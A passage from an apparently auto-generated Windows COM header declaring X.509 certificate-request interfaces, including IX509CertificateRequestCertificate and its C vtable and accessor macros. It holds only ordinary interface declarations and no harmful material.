    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs10V2_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V2_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V2_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V2_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs10V2_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs10V2_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestPkcs10V2_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_ReuseKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V2_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 


#define IX509CertificateRequestPkcs10V2_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V2_InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V2_InitializeFromPublicKeyTemplate(This,Context,pPublicKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPublicKeyTemplate(This,Context,pPublicKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V2_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestPkcs10V2_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs10V2_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestCertificate_INTERFACE_DEFINED__
#define __IX509CertificateRequestCertificate_INTERFACE_DEFINED__

/* interface IX509CertificateRequestCertificate */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestCertificate;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab343-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestCertificate : public IX509CertificateRequestPkcs10
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE CheckPublicKeySignature( 
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Issuer( 
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Issuer( 
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NotBefore( 
            /* [retval][out] */ __RPC__out DATE *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_NotBefore( 
            /* [in] */ DATE Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NotAfter( 
            /* [retval][out] */ __RPC__out DATE *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_NotAfter( 
            /* [in] */ DATE Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SerialNumber( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SerialNumber( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignerCertificate( 
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SignerCertificate( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestCertificateVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestCertificate * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestCertificate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestCertificate * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestCertificate * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestCertificate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        HRESULT ( STDMETHODCALLTYPE *CheckPublicKeySignature )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Issuer )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Issuer )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NotBefore )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NotBefore )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NotAfter )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NotAfter )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SerialNumber )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SerialNumber )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        END_INTERFACE
    } IX509CertificateRequestCertificateVtbl;

    interface IX509CertificateRequestCertificate
    {
        CONST_VTBL struct IX509CertificateRequestCertificateVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestCertificate_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestCertificate_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestCertificate_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestCertificate_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestCertificate_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestCertificate_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestCertificate_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestCertificate_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestCertificate_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestCertificate_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestCertificate_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestCertificate_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestCertificate_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestCertificate_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestCertificate_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestCertificate_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCertificate_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestCertificate_get_CspInformations(This,ppValue)	\
